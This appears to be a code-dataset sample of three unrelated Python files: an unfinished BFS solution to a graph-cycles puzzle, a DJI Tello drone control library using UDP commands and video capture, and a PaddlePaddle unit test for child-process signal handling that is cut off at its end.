| source | python |
|---|---|
planetcycles.py
|
from sys import stdin
from collections import defaultdict, deque
from threading import Thread
def bfs(t, graph, visited):
visited[t] = True
# parent[t] = -1
q = deque()
q.append(t)
clen = 0
st = set()
while len(q) > 0:
node = q.popleft()
st.add(node)
clen += 1
for i in graph[node]:
if not visited[i]:
visited[i] = True
q.append(i)
else:
# print(clen, node)
print(clen, node, st)
clen = 0
def main():
n = int(stdin.readline())
graph = defaultdict(list)
i = 1
for u in stdin.readline().split():
graph[i].append(int(u))
i += 1
visited = [False] * (n + 1)
# parent = [-1] * (n + 1)
# bfs(5, graph, visited)
# print("abc")
for t in range(1, n + 1):
if not visited[t]:
st = bfs(t, graph, visited)
print(visited)
Thread(target=main).start()
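# Usage sketch (an assumption inferred from the stdin reads above, not part of the
# original file): the first input line is the number of planets n, the second line
# lists the teleporter destination of each planet 1..n, e.g.
#   printf '5\n2 3 1 5 4\n' | python planetcycles.py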
|
tello.py
|
"""Library for interacting with DJI Ryze Tello drones.
"""
# coding=utf-8
import logging
import json
import socket
import time
from threading import Thread
from typing import Optional, Union, Type, Dict
from datetime import datetime
import cv2 # type: ignore
from .enforce_types import enforce_types
threads_initialized = False
drones: Optional[dict] = {}
client_socket: socket.socket
@enforce_types
class Tello:
"""Python wrapper to interact with the Ryze Tello drone using the official Tello api.
Tello API documentation:
[1.3](https://dl-cdn.ryzerobotics.com/downloads/tello/20180910/Tello%20SDK%20Documentation%20EN_1.3.pdf),
[2.0 with EDU-only commands](https://dl-cdn.ryzerobotics.com/downloads/Tello/Tello%20SDK%202.0%20User%20Guide.pdf)
"""
# Send and receive commands, client socket
RESPONSE_TIMEOUT = 15 # in seconds
TAKEOFF_TIMEOUT = 20 # in seconds
FRAME_GRAB_TIMEOUT = 3
TIME_BTW_COMMANDS = 0.1 # in seconds
TIME_BTW_RC_CONTROL_COMMANDS = 0.001 # in seconds
RETRY_COUNT = 3 # number of retries after a failed command
TELLO_IP = '192.168.10.1' # Tello IP address
# Video stream, server socket
VS_UDP_IP = '0.0.0.0'
VS_UDP_PORT = 11111
CONTROL_UDP_PORT = 8889
STATE_UDP_PORT = 8890
# Constants for video settings
BITRATE_AUTO = 0
BITRATE_1MBPS = 1
BITRATE_2MBPS = 2
BITRATE_3MBPS = 3
BITRATE_4MBPS = 4
BITRATE_5MBPS = 5
RESOLUTION_480P = 'low'
RESOLUTION_720P = 'high'
FPS_5 = 'low'
FPS_15 = 'middle'
FPS_30 = 'high'
CAMERA_FORWARD = 0
CAMERA_DOWNWARD = 1
# Set up logger
HANDLER = logging.StreamHandler()
FORMATTER = logging.Formatter('[%(levelname)s] %(filename)s - %(lineno)d - %(message)s')
HANDLER.setFormatter(FORMATTER)
LOGGER = logging.getLogger('djitellopy')
LOGGER.addHandler(HANDLER)
LOGGER.setLevel(logging.INFO)
# Use Tello.LOGGER.setLevel(logging.<LEVEL>) in YOUR CODE
# to only receive logs of the desired level and higher
# Conversion functions for state protocol fields
INT_STATE_FIELDS = (
# Tello EDU with mission pads enabled only
'mid', 'x', 'y', 'z',
# 'mpry': (custom format 'x,y,z')
# Common entries
'pitch', 'roll', 'yaw',
'vgx', 'vgy', 'vgz',
'templ', 'temph',
'tof', 'h', 'bat', 'time'
)
FLOAT_STATE_FIELDS = ('baro', 'agx', 'agy', 'agz')
state_field_converters: Dict[str, Union[Type[int], Type[float]]]
state_field_converters = {key: int for key in INT_STATE_FIELDS}
state_field_converters.update({key: float for key in FLOAT_STATE_FIELDS})
# VideoCapture object
cap: Optional[cv2.VideoCapture] = None
background_frame_read: Optional['BackgroundFrameRead'] = None
stream_on = False
is_flying = False
def __init__(self,
host=TELLO_IP,
retry_count=RETRY_COUNT):
global threads_initialized, client_socket, drones
self.address = (host, Tello.CONTROL_UDP_PORT)
self.stream_on = False
self.retry_count = retry_count
self.last_received_command_timestamp = time.time()
self.last_rc_control_timestamp = time.time()
if not threads_initialized:
# Run the Tello command response UDP receiver in the background
client_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client_socket.bind(('', Tello.CONTROL_UDP_PORT))
response_receiver_thread = Thread(target=Tello.udp_response_receiver)
response_receiver_thread.daemon = True
response_receiver_thread.start()
# Run the state UDP receiver in the background
state_receiver_thread = Thread(target=Tello.udp_state_receiver)
state_receiver_thread.daemon = True
state_receiver_thread.start()
threads_initialized = True
drones[host] = {'responses': [], 'state': {}}
self.LOGGER.info("Tello instance was initialized. Host: '{}'. Port: '{}'.".format(host, Tello.CONTROL_UDP_PORT))
# Getter for the Tello IP address
def get_address(self):
"""Return the Tello IP address
"""
return self.address[0]
def get_drones(self):
return drones
def get_own_udp_object(self):
"""Get own object from the global drones dict. This object is filled
with responses and state information by the receiver threads.
Internal method, you normally wouldn't call this yourself.
"""
global drones
host = self.address[0]
return drones[host]
@staticmethod
def udp_response_receiver():
"""Setup drone UDP receiver. This method listens for responses of Tello.
Must be run from a background thread in order to not block the main thread.
Internal method, you normally wouldn't call this yourself.
"""
while True:
try:
data, address = client_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at client_socket'.format(address))
if address not in drones:
continue
drones[address]['responses'].append(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def udp_state_receiver():
"""Setup state UDP receiver. This method listens for state information from
Tello. Must be run from a background thread in order to not block
the main thread.
Internal method, you normally wouldn't call this yourself.
"""
state_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
state_socket.bind(("", Tello.STATE_UDP_PORT))
while True:
try:
data, address = state_socket.recvfrom(1024)
address = address[0]
Tello.LOGGER.debug('Data received from {} at state_socket'.format(address))
if address not in drones:
continue
data = data.decode('ASCII')
drones[address]['state'] = Tello.parse_state(data)
except Exception as e:
Tello.LOGGER.error(e)
break
@staticmethod
def parse_state(state: str) -> Dict[str, Union[int, float, str]]:
"""Parse a state line to a dictionary
Internal method, you normally wouldn't call this yourself.
"""
state = state.strip()
Tello.LOGGER.debug('Raw state data: {}'.format(state))
if state == 'ok':
return {}
state_dict = {}
for field in state.split(';'):
split = field.split(':')
if len(split) < 2:
continue
key = split[0]
value: Union[int, float, str] = split[1]
if key in Tello.state_field_converters:
num_type = Tello.state_field_converters[key]
try:
value = num_type(value)
except ValueError as e:
Tello.LOGGER.debug('Error parsing state value for {}: {} to {}'
.format(key, value, num_type))
Tello.LOGGER.error(e)
continue
state_dict[key] = value
return state_dict
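# Illustrative example (not from the original source): a raw state line such as
#   "pitch:0;roll:0;yaw:-45;vgx:0;vgy:0;vgz:0;templ:65;temph:68;tof:10;h:0;bat:87;baro:312.45;time:0;agx:0.00;agy:0.00;agz:-999.00;"
# parses to {'pitch': 0, 'roll': 0, 'yaw': -45, ..., 'bat': 87, 'baro': 312.45, 'agz': -999.0},
# with int/float conversion driven by state_field_converters defined above.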
def get_current_state_always(self, path):
file_name = "state_history.json"
state_history_file = open(f'{path}/{file_name}', "w")
while self.is_flying:
if self.get_height() > 30:
data = {'ip': self.address[0], 'time': str(datetime.now().time()), 'state': self.get_current_state()}
json.dump(data, state_history_file)
state_history_file.write("\n")
state_history_file.close()
def get_current_state(self) -> dict:
"""Call this function to attain the state of the Tello. Returns a dict
with all fields.
Internal method, you normally wouldn't call this yourself.
"""
return self.get_own_udp_object()['state']
def get_state_field(self, key: str):
"""Get a specific sate field by name.
Internal method, you normally wouldn't call this yourself.
"""
state = self.get_current_state()
if key in state:
return state[key]
else:
raise Exception('Could not get state property: {}'.format(key))
def get_mission_pad_id(self) -> int:
"""Mission pad ID of the currently detected mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: -1 if none is detected, else 1-8
"""
return self.get_state_field('mid')
def get_mission_pad_distance_x(self) -> int:
"""X distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('x')
def get_mission_pad_distance_y(self) -> int:
"""Y distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('y')
def get_mission_pad_distance_z(self) -> int:
"""Z distance to current mission pad
Only available on Tello EDUs after calling enable_mission_pads
Returns:
int: distance in cm
"""
return self.get_state_field('z')
def get_pitch(self) -> int:
"""Get pitch in degree
Returns:
int: pitch in degree
"""
return self.get_state_field('pitch')
def get_roll(self) -> int:
"""Get roll in degree
Returns:
int: roll in degree
"""
return self.get_state_field('roll')
def get_yaw(self) -> int:
"""Get yaw in degree
Returns:
int: yaw in degree
"""
return self.get_state_field('yaw')
def get_speed_x(self) -> int:
"""X-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgx')
def get_speed_y(self) -> int:
"""Y-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgy')
def get_speed_z(self) -> int:
"""Z-Axis Speed
Returns:
int: speed
"""
return self.get_state_field('vgz')
def get_acceleration_x(self) -> float:
"""X-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agx')
def get_acceleration_y(self) -> float:
"""Y-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agy')
def get_acceleration_z(self) -> float:
"""Z-Axis Acceleration
Returns:
float: acceleration
"""
return self.get_state_field('agz')
def get_lowest_temperature(self) -> int:
"""Get lowest temperature
Returns:
int: lowest temperature (°C)
"""
return self.get_state_field('templ')
def get_highest_temperature(self) -> int:
"""Get highest temperature
Returns:
int: highest temperature (°C)
"""
return self.get_state_field('temph')
def get_temperature(self) -> float:
"""Get average temperature
Returns:
float: average temperature (°C)
"""
templ = self.get_lowest_temperature()
temph = self.get_highest_temperature()
return (templ + temph) / 2
def get_height(self) -> int:
"""Get current height in cm
Returns:
int: height in cm
"""
return self.get_state_field('h')
def get_distance_tof(self) -> int:
"""Get current distance value from TOF in cm
Returns:
int: TOF distance in cm
"""
return self.get_state_field('tof')
def get_barometer(self) -> int:
"""Get current barometer measurement in cm
This resembles the absolute height.
See https://en.wikipedia.org/wiki/Altimeter
Returns:
int: barometer measurement in cm
"""
return self.get_state_field('baro') * 100
def get_flight_time(self) -> int:
"""Get the time the motors have been active in seconds
Returns:
int: flight time in s
"""
return self.get_state_field('time')
def get_battery(self) -> int:
"""Get current battery percentage
Returns:
int: 0-100
"""
return self.get_state_field('bat')
def get_udp_video_address(self) -> str:
"""Internal method, you normally wouldn't call this youself.
"""
address_schema = 'udp://@{ip}:{port}' # + '?overrun_nonfatal=1&fifo_size=5000'
address = address_schema.format(ip=self.VS_UDP_IP, port=self.VS_UDP_PORT)
return address
def get_video_capture(self):
"""Get the VideoCapture object from the camera drone.
Users usually want to use get_frame_read instead.
Returns:
VideoCapture
"""
if self.cap is None:
self.cap = cv2.VideoCapture(self.get_udp_video_address())
if not self.cap.isOpened():
self.cap.open(self.get_udp_video_address())
return self.cap
def get_frame_read(self) -> 'BackgroundFrameRead':
"""Get the BackgroundFrameRead object from the camera drone. Then, you just need to call
backgroundFrameRead.frame to get the actual frame received by the drone.
Returns:
BackgroundFrameRead
"""
if self.background_frame_read is None:
address = self.get_udp_video_address()
self.background_frame_read = BackgroundFrameRead(self, address) # also sets self.cap
self.background_frame_read.start()
return self.background_frame_read
def send_command_with_return(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> str:
"""Send command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
Returns:
str: the response text on success, or a timeout/decode error message otherwise.
"""
# Commands sent in rapid succession can make the drone stop responding,
# so wait at least self.TIME_BTW_COMMANDS seconds between commands
diff = time.time() - self.last_received_command_timestamp
if diff < self.TIME_BTW_COMMANDS:
self.LOGGER.debug('Waiting {} seconds to execute command: {}...'.format(diff, command))
time.sleep(diff)
self.LOGGER.info("Send command: '{}'".format(command))
timestamp = time.time()
client_socket.sendto(command.encode('utf-8'), self.address)
responses = self.get_own_udp_object()['responses']
while not responses:
if time.time() - timestamp > timeout:
message = "Aborting command '{}'. Did not receive a response after {} seconds".format(command, timeout)
self.LOGGER.warning(message)
return message
time.sleep(0.1) # Sleep during send command
self.last_received_command_timestamp = time.time()
first_response = responses.pop(0) # first datum from socket
try:
response = first_response.decode("utf-8")
except UnicodeDecodeError as e:
self.LOGGER.error(e)
return "response decode error"
response = response.rstrip("\r\n")
self.LOGGER.info("Response {}: '{}'".format(command, response))
return response
def send_command_without_return(self, command: str):
"""Send command to Tello without expecting a response.
Internal method, you normally wouldn't call this yourself.
"""
# Commands sent in rapid succession can make the drone stop responding; callers should leave at least self.TIME_BTW_COMMANDS seconds between commands
self.LOGGER.info("Send command (no response expected): '{}'".format(command))
client_socket.sendto(command.encode('utf-8'), self.address)
def send_control_command(self, command: str, timeout: int = RESPONSE_TIMEOUT) -> bool:
"""Send control command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = "max retries exceeded"
for i in range(0, self.retry_count):
response = self.send_command_with_return(command, timeout=timeout)
if 'ok' in response.lower():
return True
self.LOGGER.debug("Command attempt #{} failed for command: '{}'".format(i, command))
self.raise_result_error(command, response)
return False # never reached
def send_read_command(self, command: str) -> str:
"""Send given command to Tello and wait for its response.
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_command_with_return(command)
try:
response = str(response)
except TypeError as e:
self.LOGGER.error(e)
if any(word in response for word in ('error', 'ERROR', 'False')):
self.raise_result_error(command, response)
return "Error: this code should never be reached"
return response
def send_read_command_int(self, command: str) -> int:
"""Send given command to Tello and wait for its response.
Parses the response to an integer
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return int(response)
def send_read_command_float(self, command: str) -> float:
"""Send given command to Tello and wait for its response.
Parses the response to a float
Internal method, you normally wouldn't call this yourself.
"""
response = self.send_read_command(command)
return float(response)
def raise_result_error(self, command: str, response: str) -> bool:
"""Used to reaise an error after an unsuccessful command
Internal method, you normally wouldn't call this yourself.
"""
tries = 1 + self.retry_count
raise Exception("Command '{}' was unsuccessful for {} tries. Latest response:\t'{}'"
.format(command, tries, response))
def connect(self, wait_for_state=True):
"""Enter SDK mode. Call this before any of the control functions.
"""
self.send_control_command("command")
if wait_for_state:
REPS = 20
for i in range(REPS):
if self.get_current_state():
t = i / REPS # in seconds
Tello.LOGGER.debug("'.connect()' received first state packet after {} seconds".format(t))
break
time.sleep(1 / REPS)
if not self.get_current_state():
raise Exception('Did not receive a state packet from the Tello')
def send_keepalive(self):
"""Send a keepalive packet to prevent the drone from landing after 15s
"""
self.send_control_command("keepalive")
def turn_motor_on(self):
"""Turn on motors without flying (mainly for cooling)
"""
self.send_control_command("motoron")
def turn_motor_off(self):
"""Turns off the motor cooling mode
"""
self.send_control_command("motoroff")
def initiate_throw_takeoff(self):
"""Allows you to take off by throwing your drone within 5 seconds of this command
"""
self.send_control_command("throwfly")
def takeoff(self):
"""Automatic takeoff.
"""
# Sometimes it takes a long time for the drone to take off and report a successful takeoff,
# so we wait with a longer timeout; otherwise the following calls would fail with an error.
self.send_control_command("takeoff", timeout=Tello.TAKEOFF_TIMEOUT)
self.is_flying = True
def land(self):
"""Automatic landing.
"""
self.send_control_command("land")
self.is_flying = False
def streamon(self):
"""Turn on video streaming. Use `tello.get_frame_read` afterwards.
Video Streaming is supported on all tellos when in AP mode (i.e.
when your computer is connected to Tello-XXXXXX WiFi network).
Currently Tello EDUs do not support video streaming while connected
to a WiFi-network.
!!! Note:
If the response is 'Unknown command' you have to update the Tello
firmware. This can be done using the official Tello app.
"""
self.send_control_command("streamon")
self.stream_on = True
def streamoff(self):
"""Turn off video streaming.
"""
self.send_control_command("streamoff")
self.stream_on = False
def emergency(self):
"""Stop all motors immediately.
"""
self.send_control_command("emergency")
def move(self, direction: str, x: int):
"""Tello fly up, down, left, right, forward or back with distance x cm.
Users would normally call one of the move_x functions instead.
Arguments:
direction: up, down, left, right, forward or back
x: 20-500
"""
self.send_control_command("{} {}".format(direction, x))
def move_up(self, x: int):
"""Fly x cm up.
Arguments:
x: 20-500
"""
self.move("up", x)
def move_down(self, x: int):
"""Fly x cm down.
Arguments:
x: 20-500
"""
self.move("down", x)
def move_left(self, x: int):
"""Fly x cm left.
Arguments:
x: 20-500
"""
self.move("left", x)
def move_right(self, x: int):
"""Fly x cm right.
Arguments:
x: 20-500
"""
self.move("right", x)
def move_forward(self, x: int):
"""Fly x cm forward.
Arguments:
x: 20-500
"""
self.move("forward", x)
def move_back(self, x: int):
"""Fly x cm backwards.
Arguments:
x: 20-500
"""
self.move("back", x)
def rotate_clockwise(self, x: int):
"""Rotate x degree clockwise.
Arguments:
x: 1-360
"""
self.send_control_command("cw {}".format(x))
def rotate_counter_clockwise(self, x: int):
"""Rotate x degree counter-clockwise.
Arguments:
x: 1-360
"""
self.send_control_command("ccw {}".format(x))
def flip(self, direction: str):
"""Do a flip maneuver.
Users would normally call one of the flip_x functions instead.
Arguments:
direction: l (left), r (right), f (forward) or b (back)
"""
self.send_control_command("flip {}".format(direction))
def flip_left(self):
"""Flip to the left.
"""
self.flip("l")
def flip_right(self):
"""Flip to the right.
"""
self.flip("r")
def flip_forward(self):
"""Flip forward.
"""
self.flip("f")
def flip_back(self):
"""Flip backwards.
"""
self.flip("b")
def go_xyz_speed(self, x: int, y: int, z: int, speed: int):
"""Fly to x y z relative to the current position.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
"""
cmd = 'go {} {} {} {}'.format(x, y, z, speed)
self.send_control_command(cmd)
def curve_xyz_speed(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the current position
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
x2: -500-500
y1: -500-500
y2: -500-500
z1: -500-500
z2: -500-500
speed: 10-60
"""
cmd = 'curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed)
self.send_control_command(cmd)
def go_xyz_speed_mid(self, x: int, y: int, z: int, speed: int, mid: int):
"""Fly to x y z relative to the mission pad with id mid.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
mid: 1-8
"""
cmd = 'go {} {} {} {} m{}'.format(x, y, z, speed, mid)
self.send_control_command(cmd)
def curve_xyz_speed_mid(self, x1: int, y1: int, z1: int, x2: int, y2: int, z2: int, speed: int, mid: int):
"""Fly to x2 y2 z2 in a curve via x2 y2 z2. Speed defines the traveling speed in cm/s.
- Both points are relative to the mission pad with id mid.
- The current position and both points must form a circle arc.
- If the arc radius is not within the range of 0.5-10 meters, it raises an Exception
- x1/x2, y1/y2, z1/z2 can't both be between -20-20 at the same time, but can both be 0.
Arguments:
x1: -500-500
y1: -500-500
z1: -500-500
x2: -500-500
y2: -500-500
z2: -500-500
speed: 10-60
mid: 1-8
"""
cmd = 'curve {} {} {} {} {} {} {} m{}'.format(x1, y1, z1, x2, y2, z2, speed, mid)
self.send_control_command(cmd)
def go_xyz_speed_yaw_mid(self, x: int, y: int, z: int, speed: int, yaw: int, mid1: int, mid2: int):
"""Fly to x y z relative to mid1.
Then fly to 0 0 z over mid2 and rotate to yaw relative to mid2's rotation.
Speed defines the traveling speed in cm/s.
Arguments:
x: -500-500
y: -500-500
z: -500-500
speed: 10-100
yaw: -360-360
mid1: 1-8
mid2: 1-8
"""
cmd = 'jump {} {} {} {} {} m{} m{}'.format(x, y, z, speed, yaw, mid1, mid2)
self.send_control_command(cmd)
def enable_mission_pads(self):
"""Enable mission pad detection
"""
self.send_control_command("mon")
def disable_mission_pads(self):
"""Disable mission pad detection
"""
self.send_control_command("moff")
def set_mission_pad_detection_direction(self, x):
"""Set mission pad detection direction. enable_mission_pads needs to be
called first. When detecting both directions detecting frequency is 10Hz,
otherwise the detection frequency is 20Hz.
Arguments:
x: 0 downwards only, 1 forwards only, 2 both directions
"""
self.send_control_command("mdirection {}".format(x))
def set_speed(self, x: int):
"""Set speed to x cm/s.
Arguments:
x: 10-100
"""
self.send_control_command("speed {}".format(x))
def send_rc_control(self, left_right_velocity: int, forward_backward_velocity: int, up_down_velocity: int,
yaw_velocity: int):
"""Send RC control via four channels. Command is sent every self.TIME_BTW_RC_CONTROL_COMMANDS seconds.
Arguments:
left_right_velocity: -100~100 (left/right)
forward_backward_velocity: -100~100 (forward/backward)
up_down_velocity: -100~100 (up/down)
yaw_velocity: -100~100 (yaw)
"""
def clamp100(x: int) -> int:
return max(-100, min(100, x))
if time.time() - self.last_rc_control_timestamp > self.TIME_BTW_RC_CONTROL_COMMANDS:
self.last_rc_control_timestamp = time.time()
cmd = 'rc {} {} {} {}'.format(
clamp100(left_right_velocity),
clamp100(forward_backward_velocity),
clamp100(up_down_velocity),
clamp100(yaw_velocity)
)
self.send_command_without_return(cmd)
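# Minimal rc-control loop sketch (illustration only, not part of the library;
# assumes a connected, airborne Tello instance named `tello`):
#   for _ in range(20):
#       tello.send_rc_control(0, 30, 0, 0)   # drift forward at 30
#       time.sleep(0.1)
#   tello.send_rc_control(0, 0, 0, 0)        # back to hover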
def set_wifi_credentials(self, ssid: str, password: str):
"""Set the Wi-Fi SSID and password. The Tello will reboot afterwords.
"""
cmd = 'wifi {} {}'.format(ssid, password)
self.send_control_command(cmd)
def connect_to_wifi(self, ssid: str, password: str):
"""Connects to the Wi-Fi with SSID and password.
After this command the tello will reboot.
Only works with Tello EDUs.
"""
cmd = 'ap {} {}'.format(ssid, password)
self.send_control_command(cmd)
def set_network_ports(self, state_packet_port: int, video_stream_port: int):
"""Sets the ports for state packets and video streaming
While you can use this command to reconfigure the Tello this library currently does not support
non-default ports (TODO!)
"""
cmd = 'port {} {}'.format(state_packet_port, video_stream_port)
self.send_control_command(cmd)
def reboot(self):
"""Reboots the drone
"""
self.send_command_without_return('reboot')
def set_video_bitrate(self, bitrate: int):
"""Sets the bitrate of the video stream
Use one of the following for the bitrate argument:
Tello.BITRATE_AUTO
Tello.BITRATE_1MBPS
Tello.BITRATE_2MBPS
Tello.BITRATE_3MBPS
Tello.BITRATE_4MBPS
Tello.BITRATE_5MBPS
"""
cmd = 'setbitrate {}'.format(bitrate)
self.send_control_command(cmd)
def set_video_resolution(self, resolution: str):
"""Sets the resolution of the video stream
Use one of the following for the resolution argument:
Tello.RESOLUTION_480P
Tello.RESOLUTION_720P
"""
cmd = 'setresolution {}'.format(resolution)
self.send_control_command(cmd)
def set_video_fps(self, fps: str):
"""Sets the frames per second of the video stream
Use one of the following for the fps argument:
Tello.FPS_5
Tello.FPS_15
Tello.FPS_30
"""
cmd = 'setfps {}'.format(fps)
self.send_control_command(cmd)
def set_video_direction(self, direction: int):
"""Selects one of the two cameras for video streaming
The forward camera is the regular 1080x720 color camera
The downward camera is a grey-only 320x240 IR-sensitive camera
Use one of the following for the direction argument:
Tello.CAMERA_FORWARD
Tello.CAMERA_DOWNWARD
"""
cmd = 'downvision {}'.format(direction)
self.send_control_command(cmd)
def send_expansion_command(self, expansion_cmd: str):
"""Sends a command to the ESP32 expansion board connected to a Tello Talent
Use e.g. tello.send_expansion_command("led 255 0 0") to turn the top led red.
"""
cmd = 'EXT {}'.format(expansion_cmd)
self.send_control_command(cmd)
def query_speed(self) -> int:
"""Query speed setting (cm/s)
Returns:
int: 1-100
"""
return self.send_read_command_int('speed?')
def query_battery(self) -> int:
"""Get current battery percentage via a query command
Using get_battery is usually faster
Returns:
int: 0-100 in %
"""
return self.send_read_command_int('battery?')
def query_flight_time(self) -> int:
"""Query current fly time (s).
Using get_flight_time is usually faster.
Returns:
int: Seconds elapsed during flight.
"""
return self.send_read_command_int('time?')
def query_height(self) -> int:
"""Get height in cm via a query command.
Using get_height is usually faster
Returns:
int: 0-3000
"""
return self.send_read_command_int('height?')
def query_temperature(self) -> int:
"""Query temperature (°C).
Using get_temperature is usually faster.
Returns:
int: 0-90
"""
return self.send_read_command_int('temp?')
def query_attitude(self) -> dict:
"""Query IMU attitude data.
Using get_pitch, get_roll and get_yaw is usually faster.
Returns:
{'pitch': int, 'roll': int, 'yaw': int}
"""
response = self.send_read_command('attitude?')
return Tello.parse_state(response)
def query_barometer(self) -> int:
"""Get barometer value (cm)
Using get_barometer is usually faster.
Returns:
int: 0-100
"""
baro = self.send_read_command_int('baro?')
return baro * 100
def query_distance_tof(self) -> float:
"""Get distance value from TOF (cm)
Using get_distance_tof is usually faster.
Returns:
float: 30-1000
"""
# example response: 801mm
tof = self.send_read_command('tof?')
return int(tof[:-2]) / 10
def query_wifi_signal_noise_ratio(self) -> str:
"""Get Wi-Fi SNR
Returns:
str: snr
"""
return self.send_read_command('wifi?')
def query_sdk_version(self) -> str:
"""Get SDK Version
Returns:
str: SDK Version
"""
return self.send_read_command('sdk?')
def query_serial_number(self) -> str:
"""Get Serial Number
Returns:
str: Serial Number
"""
return self.send_read_command('sn?')
def query_active(self) -> str:
"""Get the active status
Returns:
str
"""
return self.send_read_command('active?')
def end(self):
"""Call this method when you want to end the tello object
"""
if self.is_flying:
self.land()
if self.stream_on:
self.streamoff()
if self.background_frame_read is not None:
self.background_frame_read.stop()
if self.cap is not None:
self.cap.release()
host = self.address[0]
if host in drones:
del drones[host]
def __del__(self):
self.end()
class BackgroundFrameRead:
"""
This class reads frames from a VideoCapture in the background. Use
backgroundFrameRead.frame to get the current frame.
"""
def __init__(self, tello, address):
tello.cap = cv2.VideoCapture(address)
self.cap = tello.cap
if not self.cap.isOpened():
self.cap.open(address)
# Try grabbing a frame multiple times
# According to issue #90 the decoder might need some time
# https://github.com/damiafuentes/DJITelloPy/issues/90#issuecomment-855458905
start = time.time()
while time.time() - start < Tello.FRAME_GRAB_TIMEOUT:
Tello.LOGGER.debug('trying to grab a frame...')
self.grabbed, self.frame = self.cap.read()
if self.frame is not None:
break
time.sleep(0.05)
if not self.grabbed or self.frame is None:
raise Exception('Failed to grab first frame from video stream')
self.stopped = False
self.worker = Thread(target=self.update_frame, args=(), daemon=True)
def start(self):
"""Start the frame update worker
Internal method, you normally wouldn't call this yourself.
"""
self.worker.start()
def update_frame(self):
"""Thread worker function to retrieve frames from a VideoCapture
Internal method, you normally wouldn't call this yourself.
"""
while not self.stopped:
if not self.grabbed or not self.cap.isOpened():
self.stop()
else:
self.grabbed, self.frame = self.cap.read()
def stop(self):
"""Stop the frame update worker
Internal method, you normally wouldn't call this yourself.
"""
self.stopped = True
self.worker.join()
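# ---------------------------------------------------------------------------
# Minimal usage sketch (added for illustration; not part of the original module).
# It only calls methods defined above and assumes a Tello reachable on its
# default 192.168.10.1 Wi-Fi network.
if __name__ == '__main__':
    drone = Tello()
    drone.connect()                    # enter SDK mode and wait for a state packet
    print('Battery:', drone.get_battery(), '%')
    drone.takeoff()
    drone.move_up(50)                  # climb 50 cm
    drone.rotate_clockwise(90)         # quarter turn
    drone.land()
    drone.end()                        # release sockets, video and state resources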
|
test_imperative_signal_handler.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import signal
import unittest
import multiprocessing
import time
import paddle.compat as cpt
from paddle.fluid import core
def set_child_signal_handler(self, child_pid):
core._set_process_pids(id(self), tuple([child_pid]))
current_handler = signal.getsignal(signal.SIGCHLD)
if not callable(current_handler):
current_handler = None
def __handler__(signum, frame):
core._throw_error_if_process_failed()
if current_handler is not None:
current_handler(signum, frame)
signal.signal(signal.SIGCHLD, __handler__)
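# Note: the handler above chains onto any previously installed SIGCHLD handler.
# When a registered child process dies abnormally, core._throw_error_if_process_failed()
# raises a SystemError in the parent process, which the tests below catch and assert on.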
class TestDygraphDataLoaderSingalHandler(unittest.TestCase):
def test_child_process_exit_with_error(self):
def __test_process__():
core._set_process_signal_handler()
sys.exit(1)
def try_except_exit():
exception = None
try:
test_process = multiprocessing.Process(target=__test_process__)
test_process.start()
set_child_signal_handler(id(self), test_process.pid)
time.sleep(5)
except SystemError as ex:
self.assertIn("Fatal", cpt.get_exception_message(ex))
exception = ex
return exception
try_time = 10
exception = None
for i in range(try_time):
exception = try_except_exit()
if exception is not None:
break
self.assertIsNotNone(exception)
def test_child_process_killed_by_sigsegv(self):
def __test_process__():
core._set_process_signal_handler()
os.kill(os.getpid(), signal.SIGSEGV)
def try_except_exit():
exception = None
try:
test_process = multiprocessing.Process(target=__test_process__)
test_process.start()
set_child_signal_handler(id(self), test_process.pid)
time.sleep(5)
except SystemError as ex:
self.assertIn("Segmentation fault",
cpt.get_exception_message(ex))
exception = ex
return exception
try_time = 10
exception = None
for i in range(try_time):
exception = try_except_exit()
if exception is not None:
break
self.assertIsNotNone(exception)
def test_child_process_killed_by_sigbus(self):
def __test_process__():
core._set_process_signal_handler()
os.kill(os.getpid(), signal.SIGBUS)
def try_except_exit():
exception = None
try:
test_process = multiprocessing.Process(target=__test_process__)
test_process.start()
set_child_signal_handler(id(self), test_process.pid)
time.sleep(5)
except SystemError as ex:
self.assertIn("Bus error", cpt.get_exception_message(ex))
exception = ex
return exception
try_time = 10
exception = None
for i in range(try_time):
exception = try_except_exit()
if exception is not None:
break
self.assertIsNotNone(exception)
def test_child_process_killed_by_sigterm(self):
def __test_process__():
core._set_process_signal_handler()
time.sleep(10)
test_process = multiprocessing.Process(target=__test_process__)
test_process.daemon = True
test_process.start()
set_child_signal_handler(id(self), test_process.pid)
time.sleep(1)
if __name__ == '__main__':
